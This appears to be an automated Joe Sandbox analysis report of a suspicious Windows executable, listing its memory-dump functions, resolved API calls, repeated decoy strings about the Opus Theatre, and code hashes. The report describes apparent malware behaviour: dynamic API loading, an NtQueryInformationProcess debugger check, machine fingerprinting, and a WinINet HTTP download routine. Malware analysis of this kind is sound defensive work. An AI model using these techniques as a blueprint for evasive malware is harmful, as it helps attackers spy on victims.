GetProcAddress.KERNEL32(76210000,00991650), ref: 00E29D8F
GetProcAddress.KERNEL32(76210000,009854C8), ref: 00E29DA7
GetProcAddress.KERNEL32(76210000,00991800), ref: 00E29DC0
GetProcAddress.KERNEL32(76210000,009856E8), ref: 00E29DD8
LoadLibraryA.KERNEL32(009918A8,?,00E26CA0), ref: 00E29DEA
LoadLibraryA.KERNEL32(00991860,?,00E26CA0), ref: 00E29DFB
LoadLibraryA.KERNEL32(00991890,?,00E26CA0), ref: 00E29E0D
LoadLibraryA.KERNEL32(00991830,?,00E26CA0), ref: 00E29E1F
LoadLibraryA.KERNEL32(00991848,?,00E26CA0), ref: 00E29E30
GetProcAddress.KERNEL32(75B30000,009917E8), ref: 00E29E52
GetProcAddress.KERNEL32(751E0000,00991818), ref: 00E29E73
GetProcAddress.KERNEL32(751E0000,00991878), ref: 00E29E8B
GetProcAddress.KERNEL32(76910000,00998F20), ref: 00E29EAD
GetProcAddress.KERNEL32(75670000,00985648), ref: 00E29ECE
GetProcAddress.KERNEL32(77310000,00998C58), ref: 00E29EEF
GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00E29F06

Strings

NtQueryInformationProcess, xrefs: 00E29EFA

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: f5137ce5bbbfe70aa5c686c35e724ede179a8eeef28a6be828c521fb50bf7a95
Instruction ID: 61e620cbd6bcf42d5ea61e727802703155ace0e621d587ac5f553a1c3ef92665
Opcode Fuzzy Hash: f5137ce5bbbfe70aa5c686c35e724ede179a8eeef28a6be828c521fb50bf7a95
Instruction Fuzzy Hash: 2BA11FB5500200DFC364DFAAF8889567BEAE759F01B10865EF9898B258D73FA541CFA0

Function 00E14610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 00E1465E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E147EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1471D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E147B5
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14672
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E147C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146C8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146D3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1476E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E147CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E147AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14763
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146A7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1478F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14693

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: ae2600d3ef7d725166f94cbe56101324a761f124f1e30d373446bf74b62977e2
Instruction ID: 25b3aa136f98d7a40b954d7aad19297eb3204e84eb78af5d398127062dc81797
Opcode Fuzzy Hash: ae2600d3ef7d725166f94cbe56101324a761f124f1e30d373446bf74b62977e2
Instruction Fuzzy Hash: 1841D0B1BCA78CEAE638BFA4B86EFDF7A625F5A746F907040A800623C0CF705600C555

Function 00E162D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

Part of subcall function 00E14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
Part of subcall function 00E14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

InternetOpenA.WININET(00E30DFF,00000001,00000000,00000000,00000000), ref: 00E16331
StrCmpCA.SHLWAPI(?,0099FB60), ref: 00E16353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16385
HttpOpenRequestA.WININET(00000000,GET,?,0099F2D8,00000000,00000000,00400100,00000000), ref: 00E163D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E1640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E16421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E1644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E164BD
InternetCloseHandle.WININET(00000000), ref: 00E1653F
InternetCloseHandle.WININET(00000000), ref: 00E16549
InternetCloseHandle.WININET(00000000), ref: 00E16553

Strings

GET, xrefs: 00E163CC
ERROR, xrefs: 00E16457
ERROR, xrefs: 00E16519

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 856aa213519692172c4632bb981459b37699372400853122a2c803e7ebb56db0
Instruction ID: c4e84c6b741df3c6a0b6a97bc30696dd91f17776d1254b44ecdf1a6d682a8a0d
Opcode Fuzzy Hash: 856aa213519692172c4632bb981459b37699372400853122a2c803e7ebb56db0
Instruction Fuzzy Hash: 67717E71A00218EBDB24DFA4DC59BEEB7B5BF44700F1094A8F10A7B184DBB56A84CF51

Function 00E27690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E276D2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2770F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27793
RtlAllocateHeap.NTDLL(00000000), ref: 00E2779A
wsprintfA.USER32 ref: 00E277D0

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Strings

:, xrefs: 00E276EC
C, xrefs: 00E276DC
\, xrefs: 00E276F0

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 56cdd2fbe7e046886a2734f6f49b43f23c1520bad4bd4cbe96a852002ce5ee5b
Instruction ID: 9314d6c8cf8f6da73509669ceab96930632d82679c34464b3b1091409054f514
Opcode Fuzzy Hash: 56cdd2fbe7e046886a2734f6f49b43f23c1520bad4bd4cbe96a852002ce5ee5b
Instruction Fuzzy Hash: B741B4B1D04358DBDB10DF94DC45BDEBBB8AF08704F141099F649BB280D775AA44CBA5

Function 00E279E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27A10
RtlAllocateHeap.NTDLL(00000000), ref: 00E27A17
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E27A2F

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: da5d5cb3fc5e1cc9fcb06ae46cd422c7e118c4875a3832488d7028b8acbb948d
Instruction ID: d3ede0110cac9f483804dd3cb0a311a6c1f910bb14af6d5ccc433300715b13cf
Opcode Fuzzy Hash: da5d5cb3fc5e1cc9fcb06ae46cd422c7e118c4875a3832488d7028b8acbb948d
Instruction Fuzzy Hash: 77F04FB1D44209EBC710DF99DD45BAEFBB8EB05B21F10025AFA15A6680C77955008BE1

Function 00E11160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00E1116A
ExitProcess.KERNEL32 ref: 00E1117E

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: df547dcf61afa436f9f10a10a31eae7ddd94e14ed30ab2c05c05484945590845
Instruction ID: e4c8b68684d2bc94604d5e1cd7de91396804c51975ee27b898ac5b5e086a96ef
Opcode Fuzzy Hash: df547dcf61afa436f9f10a10a31eae7ddd94e14ed30ab2c05c05484945590845
Instruction Fuzzy Hash: E7D05E74A0030CABCB14DFE598496DDBBB9FB08715F0005D8D90572240EA319481CBA5

Function 00E29F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,009853C8), ref: 00E29F3D
GetProcAddress.KERNEL32(76210000,009853E8), ref: 00E29F55
GetProcAddress.KERNEL32(76210000,00998FF8), ref: 00E29F6E
GetProcAddress.KERNEL32(76210000,00999010), ref: 00E29F86
GetProcAddress.KERNEL32(76210000,00999058), ref: 00E29F9E
GetProcAddress.KERNEL32(76210000,0099DA90), ref: 00E29FB7
GetProcAddress.KERNEL32(76210000,0098A8B0), ref: 00E29FCF
GetProcAddress.KERNEL32(76210000,0099DA30), ref: 00E29FE7
GetProcAddress.KERNEL32(76210000,0099DA48), ref: 00E2A000
GetProcAddress.KERNEL32(76210000,0099D808), ref: 00E2A018
GetProcAddress.KERNEL32(76210000,0099DA18), ref: 00E2A030
GetProcAddress.KERNEL32(76210000,00985428), ref: 00E2A049
GetProcAddress.KERNEL32(76210000,00985448), ref: 00E2A061
GetProcAddress.KERNEL32(76210000,00985468), ref: 00E2A079
GetProcAddress.KERNEL32(76210000,00985488), ref: 00E2A092
GetProcAddress.KERNEL32(76210000,0099D9E8), ref: 00E2A0AA
GetProcAddress.KERNEL32(76210000,0099D868), ref: 00E2A0C2
GetProcAddress.KERNEL32(76210000,0098A540), ref: 00E2A0DB
GetProcAddress.KERNEL32(76210000,009854E8), ref: 00E2A0F3
GetProcAddress.KERNEL32(76210000,0099D970), ref: 00E2A10B
GetProcAddress.KERNEL32(76210000,0099D988), ref: 00E2A124
GetProcAddress.KERNEL32(76210000,0099D838), ref: 00E2A13C
GetProcAddress.KERNEL32(76210000,0099D940), ref: 00E2A154
GetProcAddress.KERNEL32(76210000,00985528), ref: 00E2A16D
GetProcAddress.KERNEL32(76210000,0099D9D0), ref: 00E2A185
GetProcAddress.KERNEL32(76210000,0099D7C0), ref: 00E2A19D
GetProcAddress.KERNEL32(76210000,0099D958), ref: 00E2A1B6
GetProcAddress.KERNEL32(76210000,0099DA00), ref: 00E2A1CE
GetProcAddress.KERNEL32(76210000,0099DAA8), ref: 00E2A1E6
GetProcAddress.KERNEL32(76210000,0099D9A0), ref: 00E2A1FF
GetProcAddress.KERNEL32(76210000,0099D880), ref: 00E2A217
GetProcAddress.KERNEL32(76210000,0099D7D8), ref: 00E2A22F
GetProcAddress.KERNEL32(76210000,0099D7F0), ref: 00E2A248
GetProcAddress.KERNEL32(76210000,0098FDA8), ref: 00E2A260
GetProcAddress.KERNEL32(76210000,0099D910), ref: 00E2A278
GetProcAddress.KERNEL32(76210000,0099DA60), ref: 00E2A291
GetProcAddress.KERNEL32(76210000,00985568), ref: 00E2A2A9
GetProcAddress.KERNEL32(76210000,0099D9B8), ref: 00E2A2C1
GetProcAddress.KERNEL32(76210000,00985588), ref: 00E2A2DA
GetProcAddress.KERNEL32(76210000,0099DA78), ref: 00E2A2F2
GetProcAddress.KERNEL32(76210000,0099D820), ref: 00E2A30A
GetProcAddress.KERNEL32(76210000,009855A8), ref: 00E2A323
GetProcAddress.KERNEL32(76210000,009855C8), ref: 00E2A33B
LoadLibraryA.KERNEL32(0099D850,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A34D
LoadLibraryA.KERNEL32(0099D8F8,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A35E
